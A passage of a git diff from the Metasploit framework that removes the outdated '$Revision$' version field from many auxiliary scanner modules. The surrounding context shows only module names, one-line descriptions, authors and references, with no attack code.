b/modules/auxiliary/gather/citrix_published_applications.rb index 99b1ed0f38..f2b4785c64 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary a published list of applications. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ], diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 1144aee22c..7017a78c4a 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary Metaframe ICA server. }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '50617' ], diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index 43df04d3d7..5dab9a5166 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'K. Reid Wightman ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 19 2012' )) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 2b6afd7346..0071faeb08 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Carlos Perez ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '1999-0532'], diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 4df5b18199..97ed6a9dd3 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0836' ], diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index 9423f20bc6..1c0fc8fa30 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Energizer DUO Trojan Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777', 'Author' => 'hdm', 'References' => diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index a265e97cfd..3fce5293b6 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DB2 Authentication Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.}, diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 62d8ec2a72..f2689b9183 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DB2 Probe Utility', - 'Version' => '$Revision$', 'Description' => 'This module queries a DB2 instance information.', 'Author' => ['todb'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 26972416a3..4a339f3919 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DB2 Discovery Service Detection', - 'Version' => '$Revision$', 'Description' => 'This module simply queries the DB2 discovery service for information.', 'Author' => [ 'MC' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index 37c52e70e6..8d712798aa 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Endpoint Mapper Service Discovery', - 'Version' => '$Revision$', 'Description' => %q{ This module can be used to obtain information from the Endpoint Mapper service. diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 06d545b37a..848044404a 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Hidden DCERPC Service Discovery', - 'Version' => '$Revision$', 'Description' => %q{ This module will query the endpoint mapper and make a list of all ncacn_tcp RPC services. It will then connect to each of diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index d3037ad441..7a2a9706a1 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Remote Management Interface Discovery', - 'Version' => '$Revision$', 'Description' => %q{ This module can be used to obtain information from the Remote Management Interface DCERPC service. diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index d51234e7e6..3f06afc98a 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DCERPC TCP Service Auditor', - 'Version' => '$Revision$', 'Description' => 'Determine what DCERPC services are accessible over a TCP port', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index ae09fd8cc1..7abf63f889 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DECT Call Scanner', - 'Version' => '$Revision$', 'Description' => 'This module scans for active DECT calls', 'Author' => [ 'DK ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index 6b158ddc5c..c4daf84971 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -14,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'DECT Base Station Scanner', - 'Version' => '$Revision$', 'Description' => 'This module scans for DECT base stations', 'Author' => [ 'DK ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 25a45d98d0..5b1e584ed4 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ARP Sweep Local Network Discovery', - 'Version' => '$Revision$', 'Description' => %q{ Enumerate alive Hosts in local network using ARP requests. }, diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index bc32a33858..e36abc0759 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -13,7 +13,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Link Local/Node Local Ping Discovery', - 'Version' => '$Revision$', 'Description' => %q{ Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds. }, diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 96b678529e..d3d3b7fc38 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Local Neighbor Discovery', - 'Version' => '$Revision$', 'Description' => %q{ Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address. Note, that like ARP scanning, this usually cannot be performed beyond the local diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 424ff1a94f..3f5814e864 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -8,7 +8,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IPv6 Local Neighbor Discovery Using Router Advertisement', - 'Version' => '$Revision$', 'Description' => %q{ Send a spoofed router advertisement with high priority to force hosts to start the IPv6 address auto-config. Monitor for IPv6 host advertisements, diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index b1c7642c22..4984ee4d19 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'UDP Service Prober', - 'Version' => '$Revision$', 'Description' => 'Detect common UDP services using sequential probes', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index ec62cc8032..8c73f06838 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'UDP Service Sweeper', - 'Version' => '$Revision$', 'Description' => 'Detect interesting UDP services', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index fce91ffe10..7674e267ca 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'EMC AlphaStor Device Manager Service', - 'Version' => '$Revision$', 'Description' => 'This module queries the remote host for the EMC Alphastor Device Management Service.', 'Author' => 'MC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 65128f38ad..c8cf804145 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'EMC AlphaStor Library Manager Service', - 'Version' => '$Revision$', 'Description' => 'This module queries the remote host for the EMC Alphastor Library Management Service.', 'Author' => 'MC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index 2692991c65..0f959b41de 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Finger Service User Enumerator', - 'Version' => '$Revision$', 'Description' => 'Identify valid users through the finger service using a variety of tricks', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 4dd49b4a29..65f162e2a5 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Anonymous FTP Access Detection', - 'Version' => '$Revision$', 'Description' => 'Detect anonymous (read/write) FTP server access.', 'References' => [ diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 3859629af5..638fa072fb 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP Authentication Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index f398d93005..19084ff194 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FTP Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect FTP Version.', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 46996d1f8f..e5132ba851 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'H.323 Version Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect H.323 Version.', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index 76e67765f7..7e923e84d8 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Adobe XML External Entity Injection', - 'Version' => '$Revision$', 'Description' => %q{ Multiple Adobe Products -- XML External Entity Injection. Affected Sofware: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index ab3b4da161..f65e278997 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache "mod_userdir" User Enumeration', - 'Version' => '$Revision$', 'Description' => %q{Apache with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 3d479efee3..5226c8f967 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -16,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index 0a33656b3e..57734b0e60 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Axis2 v1.4.1 Local File Inclusion', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index 4bc3dcad3b..8607eb1db3 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Axis2 v1.4.1 Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{This module attempts to login to an Apache Axis2 v1.4.1 instance using username and password combindations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index 93694bc6f4..89bc219d42 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Barracuda Multiple Product "locale" Directory Traversal', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a directory traversal vulnerability present in serveral Barracuda products, including the Barracuda Spam and Virus Firewall, diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index da04e3b1ac..d240995b6a 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP SSL Certificate Checker', - 'Version' => '$Revision$', 'Author' => 'nebulus', 'License' => MSF_LICENSE, 'Description' => %q{ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 01b09e21df..fd57fda9bb 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '1846'], diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index 81077c17d4..ce6b288c0d 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Patrick Webster ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '2936'], diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 54528281fe..1f25db1cc6 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability', - 'Version' => '$Revision$', 'Description' => %q{ This module tests whether a directory traversal vulnerablity is present in versions of Cisco Network Access Manager 4.8.x You may wish to change diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 173d2d1649..92aaba751e 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ColdFusion Version Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts identify various flavors of ColdFusion as well as the underlying OS }, diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index 7934c26749..9bdb5cdc5f 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ColdFusion Server Check', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to exploit the directory traversal in the 'locale' attribute. According to the advisory the following versions are vulnerable: diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index b952cbc98f..6d50554d98 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Web Site Crawler', - 'Version' => '$Revision$', 'Description' => 'Crawl a web site and store information about what was found', 'Author' => %w(hdm tasos), 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index fe999bef2b..6d0a97093c 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Dell iDRAC default Login', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index e430fd496b..f280f16494 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'FrontPage Server Extensions Anonymous Login Scanner', - 'Version' => '$Revision$', 'Description' => 'This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index c37f94e0ed..fb93096629 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'GlassFish Brute Force Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to login to GlassFish instance using username and password combindations indicated by the USER_FILE, PASS_FILE, diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 3abc443fda..5a6b0ab9a6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Login Utility', - 'Version' => '$Revision$', 'Description' => 'This module attempts to authenticate to an HTTP service.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index 24d2bf41fa..5776eaf57c 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -17,7 +17,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Writable Path PUT/DELETE File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index b33e4a3be0..a7fc335b15 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Version Detection', - 'Version' => '$Revision$', 'Description' => 'Display version information about each system', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index 9c9ff8af15..d036856766 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'mubix' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.projecthoneypot.org/httpbl_api.php'], diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index aaa4baefd1..d6dc7c3638 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module scans a JBoss instance for a few vulnerablities. }, - 'Version' => '$Revision$', 'Author' => [ 'Tyler Krpata' ], 'References' => [ diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index 811642bcfd..9d55b38c07 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed. }, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2333' ], diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index 28c13e0e3c..7842159cec 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary module will attempt to download the Majordomo config.pl file. }, 'Author' => ['Nikolas Sotiriu'], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '70762'], diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 538625e100..4a426c1a4f 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary protected folder requires either Basic, Digest or NTLM authentication. }, 'Author' => [ 'et', 'patrick' ], - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index e2f73a1b2b..1a9613739e 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Nginx Source Code Disclosure/Download', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a source code disclosure/download vulnerability in versions 0.7 and 0.8 of the nginx web server. Versions 0.7.66 and 0.8.40 diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 7cb546716e..52d347ecd3 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'HTTP Open Proxy Detection', - 'Version' => '$Revision$', 'Description' => %q{ Checks if an HTTP proxy is open. False positive are avoided verifing the HTTP return code and matching a pattern. diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 801dc3b73c..d7430ffeb6 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Options Detection', - 'Version' => '$Revision$', 'Description' => 'Display available HTTP options for each system', 'Author' => ['CG'], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index a1c38b4a4a..4ed5920b24 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -14,7 +14,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Reverse Proxy Bypass Vulnerability Scanner', - 'Version' => '$Revision$', 'Description' => %q{ Scan for poorly configured reverse proxy servers. By default, this module attempts to force the server to make diff 